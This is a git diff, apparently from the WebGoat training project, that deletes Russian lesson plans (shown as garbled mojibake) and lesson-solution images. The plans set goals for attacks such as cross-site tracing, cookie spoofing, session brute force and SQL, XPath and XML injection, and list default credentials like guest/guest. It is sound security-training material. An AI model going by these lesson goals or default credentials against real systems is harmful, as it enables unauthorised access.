Причина того что WebGoat доÑтупен только на localhost - параметр address тега Connector в файле server_80.xml. - Изначально его значение уÑтановлено в 127.0.0.1 . При запуÑке приложение начинает проверÑть пропиÑанные в наÑтройках порты - только на Ñтом адреÑе и принимает ÑÐ¾ÐµÐ´Ð¸Ð½ÐµÐ½Ð¸Ñ ÐµÑли они поÑвлÑÑŽÑ‚ÑÑ. ЕÑли вы удалите данный параметр, то приложение - начнёт проÑлушивать ÑоответÑтвующие порты на вÑех доÑтупных IP-адреÑах. -

- -

Разрешение Ñоединений только от определённых клиентов

-

-Выше опиÑывалÑÑ ÑпоÑоб Ñ€Ð°Ð·Ñ€ÐµÑˆÐµÐ½Ð¸Ñ Ñоединений Ñ WebGoat Ð´Ð»Ñ Ð»ÑŽÐ±Ñ‹Ñ… клиентов. -ЕÑли вы хотите разрешить доÑтуп к приложению только Ñ Ð¾Ð¿Ñ€ÐµÐ´ÐµÐ»Ñ‘Ð½Ð½Ñ‹Ñ… адреÑов, воÑпользуйтеÑÑŒ -фильтром удалённых адреÑов (Remote Address Filter). Ð”Ð»Ñ Ñтого добавьте Ñледующюю Ñтроку -в файл web_80.xml: -

-
-	<Valve className="org.apache.catalina.valves.RemoteAddrValve"
-	allow="127.0.0.1,ip1,ip2"/>
-
-

Ð’ Ñтом Ñлучае только localhost, ip1 и ip2 Ñмогут уÑтанавливать ÑÐ¾ÐµÐ´Ð¸Ð½ÐµÐ½Ð¸Ñ Ñ Ñервером.

- -

Стандартные пользователи WebGoat и роли Ð´Ð»Ñ Tomcat

-

-WebGoat`у Ð´Ð»Ñ Ð½Ð¾Ñ€Ð¼Ð°Ð»ÑŒÐ½Ð¾Ð¹ работы необходимо наличие Ñледующих пользователей и ролей: -
-

-  >role rolename="webgoat_basic"/<
-  >role rolename="webgoat_admin"/<
-  >role rolename="webgoat_user"/<
-  >user username="webgoat" password="webgoat" roles="webgoat_admin"/<
-  >user username="basic" password="basic" roles="webgoat_user,webgoat_basic"/<
-  >user username="guest" password="guest" roles="webgoat_user"/<
-  
-

-

Добавление пользователей

-

-Обычно Ð´Ð»Ñ Ð½Ð¾Ñ€Ð¼Ð°Ð»ÑŒÐ½Ð¾Ð¹ работы Ñ WebGoat вам доÑтаточно будет Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ guest Ñ Ð¿Ð°Ñ€Ð¾Ð»ÐµÐ¼ guest. -Ðо когда вы развернёте его в лоборатории или клаÑÑе может возникнуть необходимоÑть ÑÐ¾Ð·Ð´Ð°Ð½Ð¸Ñ Ð¾Ñ‚Ð´ÐµÐ»ÑŒÐ½Ð¾Ð³Ð¾ -Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð´Ð»Ñ ÐºÐ°Ð¶Ð´Ð¾Ð³Ð¾ клиента. Ð”Ð»Ñ Ñтого вам необходимо изменить файл tomcat-users.xml, которых находитÑÑ Ð² tomcat/conf. -Мы наÑтоÑтельно не рекомендуем хранить реальные дейÑтвующие пароли в данном файле Ñ‚.к. -там они пропиÑываютÑÑ Ð² виде проÑтого текÑта! -

-

Добавление пользователÑ

-

- Процедура Ð´Ð¾Ð±Ð°Ð²Ð»ÐµÐ½Ð¸Ñ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ð¾Ñ‡ÐµÐ½ÑŒ проÑта. Ð’ качеÑтве наглÑдного примера вы можете иÑпользовать - Ñтроку Ñ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»ÐµÐ¼ guest. Помните что каждый вновь добавлÑемый пользователь должен иметь определённую роль. - Ð”Ð»Ñ Ð´Ð¾Ð±Ð°Ð²Ð»ÐµÐ½Ð¸Ñ Ð½Ð¾Ð²Ñ‹Ñ… аккаунтов впишите в вышеуказанный файл Ñтроки типа Ñтих: -

-
-	<user name="student1" password="password1" roles="webgoat_user"/>
-	<user name="student2" password="password2" roles="webgoat_user"/>
-	...
-
- - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/TraceXSS.html b/src/main/webapp/lesson_plans/ru/TraceXSS.html deleted file mode 100644 index 08168f249..000000000 --- a/src/main/webapp/lesson_plans/ru/TraceXSS.html +++ /dev/null @@ -1,14 +0,0 @@ -
-

Ðазвание урока: Проведение XST-атак (Cross Site Tracing/Trace-XSS)

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Хорошей практикой вÑегда ÑчиталаÑÑŒ очиÑтка вÑех входÑщих данных, оÑобенно когда -их Ñодержимое будут иÑпользовано в качеÑтве команд ОС, Ñкриптов или запроÑов к -БД. Это важно и Ð´Ð»Ñ Ñ‚ÐµÑ… данных, которые будут Ñохранены где-то -внутри приложениÑ. ПоÑетители не должны иметь возможноÑть публикации на Ñайте -таких Ñообщений, которые могут изменÑть Ñтруктуру Ñтраницы при их проÑмотре. -

ОÑновные цели:

-Tomcat наÑтроен на поддержку команды HTTP TRACE. Ваша цель Ñ ÐµÑ‘ помощью оÑущеÑтвить -XST-нападение. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/UncheckedEmail.html b/src/main/webapp/lesson_plans/ru/UncheckedEmail.html deleted file mode 100644 index 0b70a3f27..000000000 --- a/src/main/webapp/lesson_plans/ru/UncheckedEmail.html +++ /dev/null @@ -1,12 +0,0 @@ -
-

Ðазвание урока: ИÑпользование непроверÑемых почтовых Ñообщений

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Многие Ñайты позволÑÑŽÑ‚ не аутентифицированным пользователÑм отправлÑть почтовые -ÑÐ¾Ð¾Ð±Ñ‰ÐµÐ½Ð¸Ñ Ñвоим "друзьÑм". Такие Ñайты предÑтавлÑÑŽÑ‚ из ÑÐµÐ±Ñ Ñ…Ð¾Ñ€Ð¾ÑˆÐ¸Ð¹ инÑтрумент -Ð´Ð»Ñ Ñпамеров, которые получают возможноÑть Ñлать рекламу Ñ Ð¸Ñпользованием -почтового Ñервера компании. - -

ОÑновные цели и задачи:

-Пользователь должен отоÑлать любое почтовое Ñообщение. diff --git a/src/main/webapp/lesson_plans/ru/UsefulTools.html b/src/main/webapp/lesson_plans/ru/UsefulTools.html deleted file mode 100644 index 74bfe257d..000000000 --- a/src/main/webapp/lesson_plans/ru/UsefulTools.html +++ /dev/null @@ -1,46 +0,0 @@ - - -

ИÑпользуемые инÑтрументы

-

-Ðиже находитÑÑ ÑпиÑок инÑтрументов, которые, по нашему мнению, могут вам пригодитьÑÑ Ð¿Ñ€Ð¸ прохождении уроков WebGoat. -Ð”Ð»Ñ Ð²Ñ‹Ð¿Ð¾Ð»Ð½ÐµÐ½Ð¸Ñ Ð±Ð¾Ð»ÑŒÑˆÐ¸Ð½Ñтва заданий вам понадобитÑÑ WebScarab или Paros.

-

WebScarab:

-

-Как и WebGoat, WebScarab - Ñто чаÑть OWASP. Он предÑтавлÑет из ÑÐµÐ±Ñ Ð¿Ñ€Ð¾ÐºÑи-Ñервер -Ð´Ð»Ñ Ð¸ÑÑÐ»ÐµÐ´Ð¾Ð²Ð°Ð½Ð¸Ñ Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ð¹ иÑпользующих протоколы HTTP и HTTPS. Так как WebScarab -ÑвлÑетÑÑ Ð¿ÐµÑ€ÐµÑ…Ð²Ð°Ñ‚Ñ‹Ð²Ð°ÑŽÑ‰Ð¸Ð¼ прокÑи-Ñервером, то мы Ñ ÐµÐ³Ð¾ помощью можем проÑматривать и изменÑть -Ñодержимое запроÑов и ответов на них. -

-

-Его Ñтраничка:http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project -

-

Firebug:

-

-Firebug - Ñто дополнение к браузеру Firefox. Мы можем иÑпользовать его Ð´Ð»Ñ Ð¿Ñ€Ð¾Ð²ÐµÑ€ÐºÐ¸, Ñ€ÐµÐ´Ð°ÐºÑ‚Ð¸Ñ€Ð¾Ð²Ð°Ð½Ð¸Ñ Ð¸ мониторинга CSS, HTML и JavaScript.

-

-Его Ñтраничка:http://www.getfirebug.com -

-

IEWatch:

-

-IEWatch - Ñто утилита Ð´Ð»Ñ Ð°Ð½Ð°Ð»Ð¸Ð·Ð° HTTP и HTML Ð´Ð»Ñ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»ÐµÐ¹ Internet Explorer.

-

-Её Ñтраничка:http://www.iewatch.com -

-

Wireshark

-

-Wireshark - Ñто анализатор Ñетевого трафика. С его помощью вы можете отлавливать Ñетевой трафик и получать из него интереÑную информацию.

-

-Его Ñтраничка:http://www.wireshark.org - -

- -

Сканнер:

-

-Ð’ данный момент имеетÑÑ Ð±Ð¾Ð»ÑŒÑˆÐ¾Ðµ количеÑтво Ñканеров Ð´Ð»Ñ Ð²ÐµÐ±-приложений. Они могут находить XSS, инъективные и другие уÑзвимоÑти. -Ðиже предÑтавлены ÑÑылки на два Ñканера Ñ Ð¾Ñ‚ÐºÑ€Ñ‹Ñ‚Ñ‹Ð¼ иÑходным кодом. -

-Nessus:http://www.nessus.org
-Paros:http://www.parosproxy.org
-

- -
diff --git a/src/main/webapp/lesson_plans/ru/WSDLScanning.html b/src/main/webapp/lesson_plans/ru/WSDLScanning.html deleted file mode 100644 index 3cf7105aa..000000000 --- a/src/main/webapp/lesson_plans/ru/WSDLScanning.html +++ /dev/null @@ -1,13 +0,0 @@ -
-

Ðазвание урока: ОÑущеÑтвление WSDL-ÑканиорваниÑ

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- - -Веб-ÑервиÑÑ‹ общаютÑÑ Ð¼ÐµÐ¶Ð´Ñƒ Ñобой Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ SOAP-запроÑов. Эти запроÑÑ‹ отправлÑÑŽÑ‚ÑÑ -на веб-ÑÐµÑ€Ð²Ð¸Ñ Ð¸ вызывают выполнение некоторых функций опиÑанных в WSDL-файлах. -

ОÑновные цели и задачи:

-Ðиже раÑположена форма ÐºÐ¾Ñ‚Ð¾Ñ€Ð°Ñ Ñ€Ð°Ð±Ð¾Ñ‚Ð°ÐµÑ‚ Ñ ÑƒÐ¶Ðµ извеÑтным вам веб-ÑервиÑом -через его API. Внимательно изучите WSDL-файл и попробуйте отправить форму так, -чтоб ÑÐµÑ€Ð²Ð¸Ñ Ð²ÐµÑ€Ð½ÑƒÐ» вам номера кредитных карт неÑкольких заказчиков. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/WeakAuthenticationCookie.html b/src/main/webapp/lesson_plans/ru/WeakAuthenticationCookie.html deleted file mode 100644 index fb97ecbed..000000000 --- a/src/main/webapp/lesson_plans/ru/WeakAuthenticationCookie.html +++ /dev/null @@ -1,19 +0,0 @@ -
-

Ðазвание урока: How to Spoof an Authentication Cookie

-
- -

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

-Многие Ñайты автоматичеÑки аутентифицируют Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ ÐµÑли он имеет оÑобые cookies. -Иногда Ñодержимое таких cookies может быть угадано еÑли злоумышленник вычиÑлил алгоритм их генерации. -Ð’ других ÑлучаÑÑ… cookies могут быть перехвачены, украдены через уÑзвимоÑти в приложении (например через XSS) -или ÑиÑтеме пользователÑ. Ðа Ñтом уроке вы ознакомитеÑÑŒ Ñ Ð¸Ñпользованием таких cookies и -попытаетеÑÑŒ обойти ÑиÑтему аутентификации оÑнованную на них. -
-

ОÑновные цели и задачи:

- -Пользователь должен обойти механизм проверки аутентификации. -Войдите под аккаунтом webgoat/webgoat и поÑмотрите что получитÑÑ. -Ð’Ñ‹ также можете попробовать данные aspect/aspect. Как только вы поймёте -как можно аутентифицироватьÑÑ Ð¿Ð¾Ð´ другими именами, попробуйте войти под -логином alice. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/WeakSessionID.html b/src/main/webapp/lesson_plans/ru/WeakSessionID.html deleted file mode 100644 index 0711706f6..000000000 --- a/src/main/webapp/lesson_plans/ru/WeakSessionID.html +++ /dev/null @@ -1,12 +0,0 @@ -
-

Ðазвание урока: Похищение ÑеÑÑии

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Разработчики приложений, Ñоздающие Ñвои механизмы работы Ñ ÑеÑÑиÑми, иногда -забывают о том что идентификаторы ÑеÑÑий должны генерироватьÑÑ Ñлучайным образом -и иметь доÑтаточную длинну. Иначе они могут быть банально подобраны злоумышленником -методом грубой Ñилы (brute force). -

ОÑновные цели:

-Попробуйте подобрать идентификатор рабочей ÑеÑÑии принадлежащей другому пользователю. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/WelcomeScreeen.html b/src/main/webapp/lesson_plans/ru/WelcomeScreeen.html deleted file mode 100644 index be93e40e2..000000000 --- a/src/main/webapp/lesson_plans/ru/WelcomeScreeen.html +++ /dev/null @@ -1,16 +0,0 @@ -
-

Lesson Plan Title:Welcome

-
-

Concept / Topic To Teach:

-This lesson presents the basics for understanding the transfer of data between the browser and the web application. -

Standards Addressed:

-

General Goal(s):

-

Specific Objectives:

-

Required Materials:

-

Anticipatory Set (Lead-In):

-

Step-By-Step Procedures:

-

Plan For Independent Practice:

-

Closure (Reflect Anticipatory Set):

-

Assessment Based On Objectives:

-

Extensions (For Gifted Students):

-

Possible Connections To Other Subjects:

\ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/WsSAXInjection.html b/src/main/webapp/lesson_plans/ru/WsSAXInjection.html deleted file mode 100644 index cd1dc0bd1..000000000 --- a/src/main/webapp/lesson_plans/ru/WsSAXInjection.html +++ /dev/null @@ -1,15 +0,0 @@ -
-

Ðазвание урока: Работа Ñ SAX-инъекциÑми в веб-ÑервиÑах

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Веб-ÑервиÑÑ‹ общаютÑÑ Ð¼ÐµÐ¶Ð´Ñƒ Ñобой Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ SOAP-запроÑов. Эти запроÑÑ‹ отправлÑÑŽÑ‚ÑÑ -на веб-ÑÐµÑ€Ð²Ð¸Ñ Ð¸ вызывают выполнение некоторых функций опиÑанных в WSDL-файлах. -

ОÑновные цели и задачи:

-Ðекоторые веб-интерфейÑÑ‹ могут иÑпользовать веб-ÑервиÑÑ‹ в невидимом Ð´Ð»Ñ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ Ñ€ÐµÐ¶Ð¸Ð¼Ðµ. -ЕÑли веб-ÑÐµÑ€Ð²Ð¸Ñ Ð½Ð¸ÐºÐ°Ðº не проверÑет целоÑтноÑть входных данных (или проверÑет недоÑтаточно), -пользователь может подделать XML отÑылаемый веб-интерфейÑом и выдать его за наÑтоÑщий. -
-
-Ð’ данном упражнении попытайтеÑÑŒ Ñменить пароль Ð´Ð»Ñ Ð»ÑŽÐ±Ð¾Ð³Ð¾ Ð¿Ð¾Ð»ÑŒÐ·Ð¾Ð²Ð°Ñ‚ÐµÐ»Ñ ÐºÑ€Ð¾Ð¼Ðµ 101. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/WsSqlInjection.html b/src/main/webapp/lesson_plans/ru/WsSqlInjection.html deleted file mode 100644 index c59407dd0..000000000 --- a/src/main/webapp/lesson_plans/ru/WsSqlInjection.html +++ /dev/null @@ -1,13 +0,0 @@ -
-

Ðазвание урока: ИÑпользование SQL-инъекций в веб-ÑервиÑах.

-
-

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- -Веб-ÑервиÑÑ‹ общаютÑÑ Ð¼ÐµÐ¶Ð´Ñƒ Ñобой Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ SOAP-запроÑов. Эти запроÑÑ‹ отправлÑÑŽÑ‚ÑÑ -на веб-ÑÐµÑ€Ð²Ð¸Ñ Ð¸ вызывают выполнение некоторых функций опиÑанных в WSDL-файлах. -

ОÑновные цели и задачи:

-Изучите внимательно WSDL-файл WebGoat и попробуйте получить -номера кредитных карт других пользователей. Обратите внимание на то, что вы не -будете видеть результат работы Ñервера на Ñкране. Ðо как только вы ÑоÑтавите верный -запроÑ, Ñразу ÑоответÑтвующий пункт меню отметитÑÑ Ð·ÐµÐ»Ñ‘Ð½Ð¾Ð¹ галочкой. - \ No newline at end of file diff --git a/src/main/webapp/lesson_plans/ru/XMLInjection.html b/src/main/webapp/lesson_plans/ru/XMLInjection.html deleted file mode 100644 index 814e18cdc..000000000 --- a/src/main/webapp/lesson_plans/ru/XMLInjection.html +++ /dev/null @@ -1,22 +0,0 @@ -
-

Ðазвание урока: Как выполнÑÑŽÑ‚ÑÑ Ð°Ñ‚Ð°ÐºÐ¸ клаÑÑа 'XML-инъекциÑ'.

-
- -

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

-Ðа данном уроке вы научитеÑÑŒ оÑущеÑтвлÑть атаки клаÑÑа 'XML-инъекциÑ' -
-
-

-Как работает данный вид атак: -

-AJAX-Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ð¸Ñпользуют XML Ð´Ð»Ñ Ð¿ÐµÑ€ÐµÐ´Ð°Ñ‡Ð¸ данных на Ñервер. Ушедший XML может быть легко перехвачен -и изменён злоумышленником. -
-

ОÑновные цели:

- -Ð’Ñ‹ видите ÑпиÑок призов, которые можно получить по программе 'WebGoat-Miles Reward Miles'. -Когда вы введёте ID Ñвоего аккаунта приложение отобразит вам ваш Ð±Ð°Ð»Ð°Ð½Ñ Ð¸ ÑпиÑок призов, которые -вы можете заказать. Цель - заказать призы на которые у Ð²Ð°Ñ Ð½Ðµ хватает очков. -ID вашего аккаунта 836239. - - diff --git a/src/main/webapp/lesson_plans/ru/XPATHInjection.html b/src/main/webapp/lesson_plans/ru/XPATHInjection.html deleted file mode 100644 index 5d6f80ba2..000000000 --- a/src/main/webapp/lesson_plans/ru/XPATHInjection.html +++ /dev/null @@ -1,31 +0,0 @@ -
-

Ðазвание урока: ИÑпользование XPATH-инъекций.

-
- -

Тема Ð´Ð»Ñ Ð¸Ð·ÑƒÑ‡ÐµÐ½Ð¸Ñ:

- Ð¡ÐµÐ¹Ñ‡Ð°Ñ Ð¼Ñ‹ раÑÑмотрим иÑпользование XPath-инъекций -
-
-

-Как работает данный вид атак: -

-По аналогии Ñ SQL-инъекциÑми, XPath-инъекции возникают тогда, когда пользовательÑкие -данные без должной проверки попадают в Ð·Ð°Ð¿Ñ€Ð¾Ñ Ðº XML-данным. ПоÑÑ‹Ð»Ð°Ñ Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸ÑŽ -Ñпецильно Ñформированные запроÑÑ‹ злоумышленник может раÑкрыть внутреннюю Ñтруктуру -XML-базы и получить доÑтуп к той информации, к которой ему обращатьÑÑ Ð½ÐµÐ»ÑŒÐ·Ñ. -Ðапример он может повыÑить Ñвои привилегии еÑли ему удаÑÑ‚ÑÑ -произвеÑти XPath-инъекцию в отношении файла хранÑщего пользовательÑкие аккаунты. - -ЗапроÑÑ‹ к XML оÑущеÑтвлÑÑŽÑ‚ÑÑ Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ XPath - не Ñложного Ñзыка, позволÑющего -определÑть меÑÑ‚Ð¾Ð½Ð°Ñ…Ð¾Ð¶Ð´ÐµÐ½Ð¸Ñ Ð¸Ð½Ñ„Ð¾Ñ€Ð¼Ð°Ñ†Ð¸Ð¸ в XML-Ñтруктуре. Как и в SQL, в нём вы можете -уÑтанавливать критерии поиÑка. Ð’ ÑлучаÑÑ… когда данные Ð¿Ñ€Ð¸Ð»Ð¾Ð¶ÐµÐ½Ð¸Ñ Ñ…Ñ€Ð°Ð½ÑÑ‚ÑÑ Ð² виде XML-базы, -пользователь Ñ Ð¿Ð¾Ð¼Ð¾Ñ‰ÑŒÑŽ одного или неÑкольких параметров запроÑа может определÑть что из неё будет -извлечено и отображено на Ñайте. Эти параметры должны тщательно проверÑтьÑÑ, чтоб атакующий -не Ñмог изменить Ñтруктуру изначального XPath-запроÑа и извлечь чувÑтвительную информацию. - -
-

ОÑновные цели:

- -Форма ниже позволÑет работникам Ñмотреть их перÑональную информацию Ð²ÐºÐ»ÑŽÑ‡Ð°Ñ Ð´Ð°Ð½Ð½Ñ‹Ðµ -о зарплате. Ваш аккаунт - Mike/test123. Цель - проÑмотреть данные других работников. - diff --git a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/Thumbs.db b/src/main/webapp/lesson_solutions/AccessControlMatrix_files/Thumbs.db deleted file mode 100644 index b269eb3f5..000000000 Binary files a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/Thumbs.db and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/filelist.xml b/src/main/webapp/lesson_solutions/AccessControlMatrix_files/filelist.xml deleted file mode 100644 index d016d8ce4..000000000 --- a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/filelist.xml +++ /dev/null @@ -1,10 +0,0 @@ - - - - - - - - - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image001.png b/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image001.png deleted file mode 100644 index ebb3f8cb8..000000000 Binary files a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image001.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image002.jpg b/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image002.jpg deleted file mode 100644 index eca131d99..000000000 Binary files a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image002.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image003.png b/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image003.png deleted file mode 100644 index 5efe24680..000000000 Binary files a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image003.png and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image004.jpg b/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image004.jpg deleted file mode 100644 index 64245b784..000000000 Binary files a/src/main/webapp/lesson_solutions/AccessControlMatrix_files/image004.jpg and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/BackDoors_files/colorschememapping.xml deleted file mode 100644 index b200daa38..000000000 --- a/src/main/webapp/lesson_solutions/BackDoors_files/colorschememapping.xml +++ /dev/null @@ -1,2 +0,0 @@ - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/filelist.xml b/src/main/webapp/lesson_solutions/BackDoors_files/filelist.xml deleted file mode 100644 index 0c8218170..000000000 --- a/src/main/webapp/lesson_solutions/BackDoors_files/filelist.xml +++ /dev/null @@ -1,18 +0,0 @@ - - - - - - - - - - - - - - - - - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image001.png b/src/main/webapp/lesson_solutions/BackDoors_files/image001.png deleted file mode 100644 index 5a4d94ac7..000000000 Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image001.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image003.png b/src/main/webapp/lesson_solutions/BackDoors_files/image003.png deleted file mode 100644 index 8150275d8..000000000 Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image003.png and /dev/null differ diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image005.png b/src/main/webapp/lesson_solutions/BackDoors_files/image005.png deleted file mode 100644 index 62ebf88f6..000000000 Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image005.png and /dev/null differ 
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image007.png b/src/main/webapp/lesson_solutions/BackDoors_files/image007.png
deleted file mode 100644
index 9960dbc61..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image009.png b/src/main/webapp/lesson_solutions/BackDoors_files/image009.png
deleted file mode 100644
index be39f6ac3..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image011.png b/src/main/webapp/lesson_solutions/BackDoors_files/image011.png
deleted file mode 100644
index ef6e16606..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image013.jpg b/src/main/webapp/lesson_solutions/BackDoors_files/image013.jpg
deleted file mode 100644
index c25f12992..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image013.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image014.jpg b/src/main/webapp/lesson_solutions/BackDoors_files/image014.jpg
deleted file mode 100644
index 08f893f3d..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image014.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image015.jpg b/src/main/webapp/lesson_solutions/BackDoors_files/image015.jpg
deleted file mode 100644
index 08c662842..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image016.jpg b/src/main/webapp/lesson_solutions/BackDoors_files/image016.jpg
deleted file mode 100644
index 9299a4a2f..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image016.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image017.jpg b/src/main/webapp/lesson_solutions/BackDoors_files/image017.jpg
deleted file mode 100644
index 49760e726..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image017.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/image018.jpg b/src/main/webapp/lesson_solutions/BackDoors_files/image018.jpg
deleted file mode 100644
index 735ea196b..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/image018.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BackDoors_files/themedata.thmx b/src/main/webapp/lesson_solutions/BackDoors_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/BackDoors_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/BasicAuthentication_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/BasicAuthentication_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@ - - \ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/filelist.xml b/src/main/webapp/lesson_solutions/BasicAuthentication_files/filelist.xml
deleted file mode 100644
index 7f6641efb..000000000
--- a/src/main/webapp/lesson_solutions/BasicAuthentication_files/filelist.xml
+++ /dev/null
@@ -1,30 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - \ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image001.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image001.png
deleted file mode 100644
index 58cb8db49..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image003.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image003.png
deleted file mode 100644
index e7380275b..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image005.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image005.png
deleted file mode 100644
index 6984b9e74..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image007.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image007.png
deleted file mode 100644
index bebf90cda..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image009.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image009.png
deleted file mode 100644
index 917746bad..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image011.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image011.png
deleted file mode 100644
index 05f16f195..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image013.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image013.png
deleted file mode 100644
index f66852324..000000000
Binary files a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image013.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/BasicAuthentication_files/image015.png b/src/main/webapp/lesson_solutions/BasicAuthentication_files/image015.png
